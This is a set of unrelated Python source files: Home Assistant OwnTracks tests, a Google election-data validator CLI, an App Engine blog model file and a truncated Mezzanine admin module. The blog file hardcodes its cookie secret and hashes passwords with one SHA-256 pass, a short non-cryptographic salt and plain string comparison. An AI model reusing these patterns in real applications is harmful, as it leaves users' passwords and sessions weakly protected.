await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_latitude(hass, INNER_ZONE["latitude"])
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
# enter keys
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
# leave keys
await send_message(hass, LOCATION_TOPIC, location_message)
await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
# leave inner region beacon
await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
await send_message(hass, LOCATION_TOPIC, location_message)
assert_location_state(hass, "inner")
assert_mobile_tracker_state(hass, "inner")
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
# GPS leave inner region, I'm in the 'outer' region now
# but on GPS coords
leave_location_message = build_message(
{
"lat": REGION_GPS_LEAVE_MESSAGE["lat"],
"lon": REGION_GPS_LEAVE_MESSAGE["lon"],
},
LOCATION_MESSAGE,
)
await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
await send_message(hass, LOCATION_TOPIC, leave_location_message)
assert_location_state(hass, "outer")
assert_mobile_tracker_state(hass, "inner")
assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
async def test_waypoint_import_simple(hass, context):
"""Test a simple import of list of waypoints."""
waypoints_message = WAYPOINTS_EXPORTED_MESSAGE.copy()
await send_message(hass, WAYPOINTS_TOPIC, waypoints_message)
# Check if it made it into states
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
assert wayp is not None
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[1])
assert wayp is not None
async def test_waypoint_import_block(hass, context):
"""Test import of list of waypoints for blocked user."""
waypoints_message = WAYPOINTS_EXPORTED_MESSAGE.copy()
await send_message(hass, WAYPOINTS_TOPIC_BLOCKED, waypoints_message)
# Check if it made it into states
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[2])
assert wayp is None
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[3])
assert wayp is None
async def test_waypoint_import_no_whitelist(hass, setup_comp):
"""Test import of list of waypoints with no whitelist set."""
await setup_owntracks(
hass,
{
CONF_MAX_GPS_ACCURACY: 200,
CONF_WAYPOINT_IMPORT: True,
CONF_MQTT_TOPIC: "owntracks/#",
},
)
waypoints_message = WAYPOINTS_EXPORTED_MESSAGE.copy()
await send_message(hass, WAYPOINTS_TOPIC_BLOCKED, waypoints_message)
# Check if it made it into states
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[2])
assert wayp is not None
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[3])
assert wayp is not None
async def test_waypoint_import_bad_json(hass, context):
"""Test importing a bad JSON payload."""
waypoints_message = WAYPOINTS_EXPORTED_MESSAGE.copy()
await send_message(hass, WAYPOINTS_TOPIC, waypoints_message, True)
# Check if it made it into states
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[2])
assert wayp is None
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[3])
assert wayp is None
async def test_waypoint_import_existing(hass, context):
"""Test importing a zone that exists."""
waypoints_message = WAYPOINTS_EXPORTED_MESSAGE.copy()
await send_message(hass, WAYPOINTS_TOPIC, waypoints_message)
# Get the first waypoint exported
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
# Send an update
waypoints_message = WAYPOINTS_UPDATED_MESSAGE.copy()
await send_message(hass, WAYPOINTS_TOPIC, waypoints_message)
new_wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
assert wayp == new_wayp
async def test_single_waypoint_import(hass, context):
"""Test single waypoint message."""
waypoint_message = WAYPOINT_MESSAGE.copy()
await send_message(hass, WAYPOINT_TOPIC, waypoint_message)
wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
assert wayp is not None
async def test_not_implemented_message(hass, context):
"""Handle not implemented message type."""
patch_handler = patch(
"homeassistant.components.owntracks.messages.async_handle_not_impl_msg",
return_value=mock_coro(False),
)
patch_handler.start()
assert not await send_message(hass, LWT_TOPIC, LWT_MESSAGE)
patch_handler.stop()
async def test_unsupported_message(hass, context):
"""Handle not implemented message type."""
patch_handler = patch(
"homeassistant.components.owntracks.messages.async_handle_unsupported_msg",
return_value=mock_coro(False),
)
patch_handler.start()
assert not await send_message(hass, BAD_TOPIC, BAD_MESSAGE)
patch_handler.stop()
def generate_ciphers(secret):
"""Generate test ciphers for the DEFAULT_LOCATION_MESSAGE."""
# PyNaCl ciphertext generation will fail if the module
# cannot be imported. However, the test for decryption
# also relies on this library and won't be run without it.
import pickle
import base64
try:
from nacl.secret import SecretBox
from nacl.encoding import Base64Encoder
keylen = SecretBox.KEY_SIZE
key = secret.encode("utf-8")
key = key[:keylen]
key = key.ljust(keylen, b"\0")
msg = json.dumps(DEFAULT_LOCATION_MESSAGE).encode("utf-8")
ctxt = SecretBox(key).encrypt(msg, encoder=Base64Encoder).decode("utf-8")
except (ImportError, OSError):
ctxt = ""
mctxt = base64.b64encode(
pickle.dumps(
(
secret.encode("utf-8"),
json.dumps(DEFAULT_LOCATION_MESSAGE).encode("utf-8"),
)
)
).decode("utf-8")
return ctxt, mctxt
TEST_SECRET_KEY = "s3cretkey"
CIPHERTEXT, MOCK_CIPHERTEXT = generate_ciphers(TEST_SECRET_KEY)
ENCRYPTED_LOCATION_MESSAGE = {
# Encrypted version of LOCATION_MESSAGE using libsodium and TEST_SECRET_KEY
"_type": "encrypted",
"data": CIPHERTEXT,
}
MOCK_ENCRYPTED_LOCATION_MESSAGE = {
# Mock-encrypted version of LOCATION_MESSAGE using pickle
"_type": "encrypted",
"data": MOCK_CIPHERTEXT,
}
def mock_cipher():
"""Return a dummy pickle-based cipher."""
def mock_decrypt(ciphertext, key):
"""Decrypt/unpickle."""
import pickle
import base64
(mkey, plaintext) = pickle.loads(base64.b64decode(ciphertext))
if key != mkey:
raise ValueError()
return plaintext
return len(TEST_SECRET_KEY), mock_decrypt
@pytest.fixture
def config_context(hass, setup_comp):
"""Set up the mocked context."""
patch_load = patch(
"homeassistant.components.device_tracker.async_load_config",
return_value=mock_coro([]),
)
patch_load.start()
patch_save = patch(
"homeassistant.components.device_tracker.DeviceTracker.async_update_config"
)
patch_save.start()
yield
patch_load.stop()
patch_save.stop()
@pytest.fixture(name="not_supports_encryption")
def mock_not_supports_encryption():
"""Mock non successful nacl import."""
with patch(
"homeassistant.components.owntracks.messages.supports_encryption",
return_value=False,
):
yield
@pytest.fixture(name="get_cipher_error")
def mock_get_cipher_error():
"""Mock non successful cipher."""
with patch(
"homeassistant.components.owntracks.messages.get_cipher", side_effect=OSError()
):
yield
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload(hass, setup_comp):
"""Test encrypted payload."""
await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_topic_key(hass, setup_comp):
"""Test encrypted payload with a topic key."""
await setup_owntracks(hass, {CONF_SECRET: {LOCATION_TOPIC: TEST_SECRET_KEY}})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
async def test_encrypted_payload_not_supports_encryption(
hass, setup_comp, not_supports_encryption
):
"""Test encrypted payload with no supported encryption."""
await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert hass.states.get(DEVICE_TRACKER_STATE) is None
async def test_encrypted_payload_get_cipher_error(hass, setup_comp, get_cipher_error):
"""Test encrypted payload with no supported encryption."""
await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_no_key(hass, setup_comp):
"""Test encrypted payload with no key, ."""
assert hass.states.get(DEVICE_TRACKER_STATE) is None
await setup_owntracks(hass, {CONF_SECRET: {}})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_wrong_key(hass, setup_comp):
"""Test encrypted payload with wrong key."""
await setup_owntracks(hass, {CONF_SECRET: "wrong key"})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_wrong_topic_key(hass, setup_comp):
"""Test encrypted payload with wrong topic key."""
await setup_owntracks(hass, {CONF_SECRET: {LOCATION_TOPIC: "wrong key"}})
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_no_topic_key(hass, setup_comp):
"""Test encrypted payload with no topic key."""
await setup_owntracks(
hass, {CONF_SECRET: {"owntracks/{}/{}".format(USER, "otherdevice"): "foobar"}}
)
await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
assert hass.states.get(DEVICE_TRACKER_STATE) is None
async def test_encrypted_payload_libsodium(hass, setup_comp):
"""Test sending encrypted message payload."""
try:
import nacl # noqa: F401 pylint: disable=unused-import
except (ImportError, OSError):
pytest.skip("PyNaCl/libsodium is not installed")
return
await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
await send_message(hass, LOCATION_TOPIC, ENCRYPTED_LOCATION_MESSAGE)
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
async def test_customized_mqtt_topic(hass, setup_comp):
"""Test subscribing to a custom mqtt topic."""
await setup_owntracks(hass, {CONF_MQTT_TOPIC: "mytracks/#"})
topic = f"mytracks/{USER}/{DEVICE}"
await send_message(hass, topic, LOCATION_MESSAGE)
assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
async def test_region_mapping(hass, setup_comp):
"""Test region to zone mapping."""
await setup_owntracks(hass, {CONF_REGION_MAPPING: {"foo": "inner"}})
hass.states.async_set("zone.inner", "zoning", INNER_ZONE)
message = build_message({"desc": "foo"}, REGION_GPS_ENTER_MESSAGE)
assert message["desc"] == "foo"
await send_message(hass, EVENT_TOPIC, message)
assert_location_state(hass, "inner")
async def test_restore_state(hass, hass_client):
"""Test that we can restore state."""
entry = MockConfigEntry(
domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
)
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
client = await hass_client()
resp = await client.post(
"/api/webhook/owntracks_test",
json=LOCATION_MESSAGE,
headers={"X-Limit-u": "Paulus", "X-Limit-d": "Pixel"},
)
assert resp.status == 200
await hass.async_block_till_done()
state_1 = hass.states.get("device_tracker.paulus_pixel")
assert state_1 is not None
await hass.config_entries.async_reload(entry.entry_id)
await hass.async_block_till_done()
state_2 = hass.states.get("device_tracker.paulus_pixel")
assert state_2 is not None
assert state_1 is not state_2
assert state_1.state == state_2.state
assert state_1.name == state_2.name
assert state_1.attributes["latitude"] == state_2.attributes["latitude"]
assert state_1.attributes["longitude"] == state_2.attributes["longitude"]
assert state_1.attributes["battery_level"] == state_2.attributes["battery_level"]
assert state_1.attributes["source_type"] == state_2.attributes["source_type"]
async def test_returns_empty_friends(hass, hass_client):
"""Test that an empty list of persons' locations is returned."""
entry = MockConfigEntry(
domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
)
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
client = await hass_client()
resp = await client.post(
"/api/webhook/owntracks_test",
json=LOCATION_MESSAGE,
headers={"X-Limit-u": "Paulus", "X-Limit-d": "Pixel"},
)
assert resp.status == 200
assert await resp.text() == "[]"
async def test_returns_array_friends(hass, hass_client):
"""Test that a list of persons' current locations is returned."""
otracks = MockConfigEntry(
domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
)
otracks.add_to_hass(hass)
await hass.config_entries.async_setup(otracks.entry_id)
await hass.async_block_till_done()
# Setup device_trackers
assert await async_setup_component(
hass,
"person",
{
"person": [
{
"name": "person 1",
"id": "person1",
"device_trackers": ["device_tracker.person_1_tracker_1"],
},
{
"name": "person2",
"id": "person2",
"device_trackers": ["device_tracker.person_2_tracker_1"],
},
]
},
)
hass.states.async_set(
"device_tracker.person_1_tracker_1", "home", {"latitude": 10, "longitude": 20}
)
client = await hass_client()
resp = await client.post(
"/api/webhook/owntracks_test",
json=LOCATION_MESSAGE,
headers={"X-Limit-u": "Paulus", "X-Limit-d": "Pixel"},
)
assert resp.status == 200
response_json = json.loads(await resp.text())
assert response_json[0]["lat"] == 10
assert response_json[0]["lon"] == 20
assert response_json[0]["tid"] == "p1"
| |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""NIST CDF validation library.
A set of rules that can be used to validate a NIST 1500-100 file containing
election candidate or sitting officeholder data according to the included
XSD and additional higher-level requirements.
See https://developers.google.com/elections-data/reference/
"""
from __future__ import print_function
import argparse
import cProfile
import hashlib
import io
import os
import pstats
import re
from civics_cdf_validator import base
from civics_cdf_validator import gpunit_rules
from civics_cdf_validator import loggers
from civics_cdf_validator import rules
from civics_cdf_validator import version
import github
def _validate_path(parser, arg):
"""Check that the files provided exist."""
if not os.path.exists(arg):
parser.error("The file path for %s doesn't exist" % arg)
else:
return arg
def _validate_rules(parser, arg):
"""Check that the listed rules exist."""
invalid_rules = []
rule_names = [x.__name__ for x in rules.ALL_RULES]
input_rules = arg.strip().split(",")
for rule in input_rules:
if rule and rule not in rule_names:
invalid_rules.append(rule)
if invalid_rules:
parser.error("The rule(s) %s do not exist" % ", ".join(invalid_rules))
else:
return input_rules
def _validate_severity(parser, arg):
"""Check that the severity level provided is correct."""
valid_severities = loggers.supported_severities_mapping()
if arg.strip().lower() not in valid_severities:
parser.error("Invalid severity. Options are {0}".format(
valid_severities.keys()))
else:
return valid_severities[arg.strip().lower()]
# pylint: disable=g-doc-args
# pylint: disable=g-doc-return-or-yield
def _validate_country_codes(parser, arg):
"""Check that the supplied 2 country code is correct.
The repo is at https://github.com/opencivicdata/ocd-division-ids
"""
country_code = arg.strip().lower()
# 'us' is the default country code and will always be valid.
# This is so we bypass the call to the GitHub API when no -c flag
if country_code == "us":
return country_code
github_api = github.Github()
country_ids = github_api.get_repo(
"opencivicdata/ocd-division-ids").get_contents("identifiers")
valid_codes = []
for content_file in country_ids:
if content_file.type == "file":
result = re.search(r"country-([a-z]{2})\.csv", content_file.name)
if result:
ocd_id = result.group(1)
if country_code == ocd_id:
return country_code
else:
valid_codes.append(ocd_id)
parser.error("Invalid country code. Available codes are: %s" %
", ".join(valid_codes))
def arg_parser():
"""Parser for command line arguments."""
description = ("Script to validate that "
"election results XML file(s) "
"follow best practices")
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(dest="cmd")
parser_validate = subparsers.add_parser("validate")
add_validate_parser_args(parser, parser_validate)
parser_list = subparsers.add_parser("list")
add_parser_rules_filter_args(parser, parser_list)
return parser
def add_validate_parser_args(parser, parser_validate):
add_validate_parser_input_file_args(parser, parser_validate)
add_validate_parser_output_args(parser, parser_validate)
add_validate_parser_ocd_id_args(parser, parser_validate)
add_parser_rules_filter_args(parser, parser_validate)
parser_validate.add_argument(
"--required_languages",
help="Languages required by the AllLanguages check.",
required=False)
parser_validate.add_argument(
"--profile_report",
help="Run profiling and print the execution report.",
required=False)
def add_validate_parser_input_file_args(parser, parser_validate):
parser_validate.add_argument(
"-x",
"--xsd",
help="Common Data Format XSD file path",
required=True,
metavar="xsd_file",
type=lambda x: _validate_path(parser, x))
parser_validate.add_argument(
"election_files",
help="XML election files to be validated",
nargs="+",
metavar="election_files",
type=lambda x: _validate_path(parser, x))
def add_validate_parser_output_args(parser, parser_validate):
"""Enriches cmd "validate" parser with output display config."""
parser_validate.add_argument(
"--verbose",
"-v",
action="store_true",
help="Print out detailed log messages. Defaults to False",
required=False)
parser_validate.add_argument(
"--severity",
"-s",
type=lambda x: _validate_severity(parser, x),
help="Minimum issue severity level - {0}".format(
loggers.severities_names()),
required=False)
def add_validate_parser_ocd_id_args(parser, parser_validate):
"""Enriches cmd "validate" parser with ocdId related arguments."""
parser_validate.add_argument(
"--ocdid_file",
help="Local ocd-id csv file path",
required=False,
metavar="csv_file",
type=lambda x: _validate_path(parser, x))
parser_validate.add_argument(
"-c",
help="Two letter country code for OCD IDs.",
metavar="country",
type=lambda x: _validate_country_codes(parser, x),
required=False,
default="us")
parser_validate.add_argument(
"-g",
help="Skip check to see if there is a new OCD ID file on Github."
"Defaults to True",
action="store_true",
required=False)
def add_parser_rules_filter_args(parser, cmd_parser):
"""Enriches cmd parser with rules related arguments."""
cmd_parser.add_argument(
"-e",
help="Comma separated list of rules to be excluded.",
required=False,
type=lambda x: _validate_rules(parser, x))
group = cmd_parser.add_mutually_exclusive_group(required=False)
group.add_argument(
"-i",
help="Comma separated list of rules to be validated.",
required=False,
type=lambda x: _validate_rules(parser, x))
group.add_argument(
"--rule_set",
"-r",
help="Pre-defined rule set: [{}].".format(", ".join(
s.name.lower() for s in rules.RuleSet)),
required=False,
default="election",
type=ruleset_type)
def ruleset_type(enum_string):
try:
return rules.RuleSet[enum_string.upper()]
except KeyError:
msg = "Rule set must be one of [{}]".format(", ".join(
s.name.lower() for s in rules.RuleSet))
raise argparse.ArgumentTypeError(msg)
def get_metadata(file):
"""Gets metadata associated with this run of the validator."""
metadata = ["Validator version: {}".format(version.__version__)]
blocksize = 65536
digest = hashlib.new("sha3_256")
for block in iter(lambda: file.read(blocksize), b""):
digest.update(block)
metadata.append("SHA3-256 checksum: 0x{}".format(digest.hexdigest()))
file.seek(0)
return metadata
def display_rules_details(options):
"""Display rules set details based on user input."""
print("Selected rules details:")
rules_to_display = filter_all_rules_using_user_arg(
options.i, options.rule_set, options.e)
for rule in sorted(rules_to_display, key=lambda x: x.__name__):
print("\t{} - {}".format(rule.__name__, rule.__doc__.split("\n")[0]))
def filter_all_rules_using_user_arg(rules_allowlist, rule_set, rules_blocklist):
"""Extract a sublist from ALL_RULES list using the user input."""
if rules_allowlist:
rule_names = rules_allowlist
else:
if rule_set == rules.RuleSet.ELECTION:
rule_names = [x.__name__ for x in rules.ELECTION_RULES]
elif rule_set == rules.RuleSet.OFFICEHOLDER:
rule_names = [x.__name__ for x in rules.OFFICEHOLDER_RULES]
else:
raise AssertionError("Invalid rule_set: " + rule_set)
if rules_blocklist:
rule_names = set(rule_names) - set(rules_blocklist)
rule_classes_to_check = [
x for x in rules.ALL_RULES if x.__name__ in rule_names
]
return rule_classes_to_check
def compute_max_found_severity(exceptions_wrapper):
if exceptions_wrapper.count_logs_with_exception_type(loggers.ElectionError):
return 3
elif exceptions_wrapper.count_logs_with_exception_type(loggers.
ElectionWarning):
return 2
elif exceptions_wrapper.count_logs_with_exception_type(loggers.ElectionInfo):
return 1
else:
return 0
def exec_profiling(func):
"""This is a decorator to add profiling to the feed validation."""
def add_profiling_if_needed(args):
if args is None or not args.profile_report:
return func(args)
pr = cProfile.Profile(builtins=False)
pr.enable()
result = func(args)
pr.disable()
s = io.StringIO()
ps = pstats.Stats(pr, stream=s).strip_dirs().sort_stats("cumulative")
ps.print_stats("rules")
print(s.getvalue())
return result
return add_profiling_if_needed
@exec_profiling
def feed_validation(options):
"""Validate the input feed depending on the user parameters."""
rule_options = {}
gpunit_rules.GpUnitOcdIdValidator.init_ocd_id_list(options.c,
options.ocdid_file,
not options.g)
if options.required_languages:
rule_options.setdefault("AllLanguages", []).append(
base.RuleOption("required_languages",
str.split(options.required_languages, ",")))
rule_classes_to_check = filter_all_rules_using_user_arg(
options.i, options.rule_set, options.e)
errors = 0
for election_file in options.election_files:
print("\n--------- Results after validating file: {0} ".format(
election_file.name))
for metadatum in get_metadata(election_file):
print(metadatum)
registry = base.RulesRegistry(
election_file=election_file,
schema_file=options.xsd,
rule_classes_to_check=rule_classes_to_check,
rule_options=rule_options)
registry.check_rules()
registry.print_exceptions(options.severity, options.verbose)
if options.verbose:
registry.count_stats()
errors = max(errors,
compute_max_found_severity(registry.exceptions_wrapper))
return errors
def main():
p = arg_parser()
options = p.parse_args()
if options.cmd == "list":
display_rules_details(options)
return None
elif options.cmd == "validate":
options.election_files = [
open(file, "rb") for file in options.election_files
]
options.xsd = open(options.xsd, "r")
if options.ocdid_file:
options.ocdid_file = open(options.ocdid_file, encoding="utf-8")
return_value = feed_validation(options)
for file in options.election_files:
file.close()
options.xsd.close()
if options.ocdid_file:
options.ocdid_file.close()
return return_value
if __name__ == "__main__":
main()
| |
import hmac
import hashlib
import random
import string
from google.appengine.ext import ndb
# for hmac on cookies - should be somewhere else
SECRET_KEY = "Fdh3nhUsLhy"
def make_secure_val(val):
""" use hmac with secret key to create a secure cookie """
return "{}|{}".format(val, hmac.new(SECRET_KEY, val).hexdigest())
def check_secure_val(secure_val):
""" check that the current cookie is secure """
val = secure_val.split("|")[0]
if secure_val == make_secure_val(val):
return val
def make_salt():
""" make a 5 letter salt for password hashing """
return ''.join(random.choice(string.letters) for x in xrange(5))
def make_pw_hash(name, pw, salt=None):
"""
use sha256 with the salt and user name to create a secure password
or take a passed salt to recreate a secure password for checking
"""
if not salt:
salt = make_salt()
h = hashlib.sha256(name + pw + salt).hexdigest()
return '%s,%s' % (h, salt)
def valid_pw(name, pw, h):
"""
call the make_pw_hash with the salt stored with the password
this checks whether user/password supplied matches that stored for the user
"""
salt = h.split(",")[1]
if make_pw_hash(name, pw, salt) == h:
return True
else:
return False
class BlogUser(ndb.Model):
"""
user who can login, write blog entries and comment/like other people's
"""
username = ndb.StringProperty(required=True)
pwd = ndb.StringProperty(required=True)
email = ndb.StringProperty(required=True)
created = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def by_id(cls, user_id):
""" class method to return a user, if found, by ID """
return cls.get_by_id(user_id)
@classmethod
def login(cls, username=None, password=None):
"""
Check that the username and password is valid
if so, return the User entity
"""
# look up the username
user_list = cls.query(cls.username == username).fetch(1)
# check if user exists and password is valid against it's hash
if user_list and valid_pw(username, password, user_list[0].pwd):
return user_list[0]
else:
return None
@classmethod
def signup(cls, username=None, password=None, email=None):
"""
method to register a new user
assuming the user doesn't already exist
"""
user = None
# test if the username already exists
user_list = cls.query(cls.username == username).fetch(1)
if not user_list:
# signup user if username does not exist create hashed password
user = BlogUser(username=username,
pwd=make_pw_hash(username, password),
email=email).put()
return user
class BlogComment(ndb.Model):
""" blog comment for structured property as part of BlogPost """
userkey = ndb.KeyProperty(kind=BlogUser, required=True)
username = ndb.StringProperty(required=True)
comment = ndb.TextProperty(required=True)
created = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True)
class BlogPost(ndb.Model):
""" Entity to store the blog entries made by owners """
username = ndb.StringProperty(required=True)
userkey = ndb.KeyProperty(kind=BlogUser, required=True)
subject = ndb.StringProperty(required=True)
blog = ndb.TextProperty(required=True)
created = ndb.DateTimeProperty(auto_now_add=True)
updated = ndb.DateTimeProperty(auto_now=True)
likes = ndb.IntegerProperty()
dislikes = ndb.IntegerProperty()
comments = ndb.StructuredProperty(BlogComment, repeated=True)
@classmethod
def get_blogs(cls, n=1):
""" return the top n blogs ordered by most recent update date """
return cls.query().order(-cls.updated).fetch(n)
@classmethod
def by_id(cls, blog_id):
""" return a specific blog entity by passing a blog id """
return cls.get_by_id(blog_id)
@classmethod
def new_post(cls, user=None, subject="", posting=""):
""" process a new post and return a post object """
post = cls(username=user.username, userkey=user.key, subject=subject,
blog=posting, likes=0, dislikes=0, comments=[])
return post.put()
@classmethod
def save_comment(cls, user=None, blog=None, comment_id=None,
comment=None):
""" test the comment id and then update that comment """
new_comment = BlogComment(userkey=user.key,
username=user.username, comment=comment)
# because using a structured property, create new list of comments
new_comments = []
x = 0
# replace this comment defined by the index with the new version
for item in blog.comments:
if (comment_id != x):
new_comments.append(item)
else:
new_comments.append(new_comment)
x += 1
blog.comments = new_comments
return blog.put()
# class method to delete a comment
@classmethod
def delete_comment(cls, blog=None, comment_id=None):
""" remove the comment id from the list of comments """
try:
# is the comment id valid
comment_id = int(comment_id)
new_comments = []
x = 0
for item in blog.comments:
if (comment_id != x):
new_comments.append(item)
x += 1
blog.comments = new_comments
return blog.put()
except ValueError:
return False
# class method to add a comment
@classmethod
def add_comment(cls, user=None, blog=None, comment=None):
"""
create a new comment and save it
"""
try:
blog_comment = BlogComment(userkey=user.key,
username=user.username,
comment=comment)
# need to test if structure is present on blog
if blog.comments:
blog.comments.append(blog_comment)
else:
blog_comments = [blog_comment]
blog.comments = blog_comments
return blog.put()
except ValueError:
return False
@classmethod
def edit_blog(cls, blog=None, subject=None, posting=None):
""" method to post the edit away """
blog.subject = subject
blog.blog = posting
try:
return blog.put()
except:
return False
@classmethod
def delete_blog(cls, blog=None):
""" deletion process for a blog """
try:
# the blog is owned by the user so can delete
blog.key.delete()
return True
except:
return False
@classmethod
def like_blog(cls, user=None, blog=None, like_action=None):
""" either like or dislike the blog and update the counts """
try:
if like_action:
bloglike = BlogLike(userkey=user.key,
blogkey=blog.key, like=True).put()
if bloglike:
blog.likes += 1
blog.put()
else:
bloglike = BlogLike(userkey=user.key,
blogkey=blog.key, like=False).put()
if bloglike:
blog.dislikes += 1
blog.put()
return True
except:
return False
class BlogLike(ndb.Model):
""" referenced entity to manage like / dislike of blog post """
userkey = ndb.KeyProperty(kind=BlogUser, required=True)
blogkey = ndb.KeyProperty(kind=BlogPost, required=True)
like = ndb.BooleanProperty(required=True)
created = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def like_exists(cls, user=None, blog=None):
""" return a match if a user has liked/disliked a blog """
return cls.query(cls.blogkey == blog.key,
cls.userkey == user.key).fetch(1)
| |
from __future__ import unicode_literals
from copy import deepcopy
from django.contrib import admin
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import NoReverseMatch
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from mezzanine.conf import settings
from mezzanine.core.admin import DisplayableAdmin, DisplayableAdminForm
from mezzanine.pages.models import Page, RichTextPage, Link
from mezzanine.utils.urls import admin_url
# Add extra fields for pages to the Displayable fields.
# We only add the menu field if PAGE_MENU_TEMPLATES has values.
page_fieldsets = deepcopy(DisplayableAdmin.fieldsets)
if settings.PAGE_MENU_TEMPLATES:
page_fieldsets[0][1]["fields"] += ("in_menus",)
page_fieldsets[0][1]["fields"] += ("login_required",)
class PageAdminForm(DisplayableAdminForm):
def clean_slug(self):
"""
Save the old slug to be used later in PageAdmin.save_model()
to make the slug change propagate down the page tree.
"""
self.instance._old_slug = self.instance.slug
return self.cleaned_data['slug']
class PageAdmin(DisplayableAdmin):
"""
Admin class for the ``Page`` model and all subclasses of
``Page``. Handles redirections between admin interfaces for the
``Page`` model and its subclasses.
"""
form = PageAdminForm
fieldsets = page_fieldsets
change_list_template = "admin/pages/page/change_list.html"
def __init__(self, *args, **kwargs):
"""
For ``Page`` subclasses that are registered with an Admin class
that doesn't implement fieldsets, add any extra model fields
to this instance's fieldsets. This mimics Django's behaviour of
adding all model fields when no fieldsets are defined on the
Admin class.
"""
super(PageAdmin, self).__init__(*args, **kwargs)
# Test that the fieldsets don't differ from PageAdmin's.
if self.model is not Page and self.fieldsets == PageAdmin.fieldsets:
# Make a copy so that we aren't modifying other Admin
# classes' fieldsets.
self.fieldsets = deepcopy(self.fieldsets)
# Insert each field between the publishing fields and nav
# fields. Do so in reverse order to retain the order of
# the model's fields.
exclude_fields = Page._meta.get_all_field_names() + ["page_ptr"]
try:
exclude_fields.extend(self.exclude)
except (AttributeError, TypeError):
pass
try:
exclude_fields.extend(self.form.Meta.exclude)
except (AttributeError, TypeError):
pass
fields = self.model._meta.fields + self.model._meta.many_to_many
for field in reversed(fields):
if field.name not in exclude_fields and field.editable:
self.fieldsets[0][1]["fields"].insert(3, field.name)
def in_menu(self):
"""
Hide subclasses from the admin menu.
"""
return self.model is Page
def _check_permission(self, request, page, permission):
"""
Runs the custom permission check and raises an
exception if False.
"""
if not getattr(page, "can_" + permission)(request):
raise PermissionDenied
def add_view(self, request, **kwargs):
"""
For the ``Page`` model, redirect to the add view for the
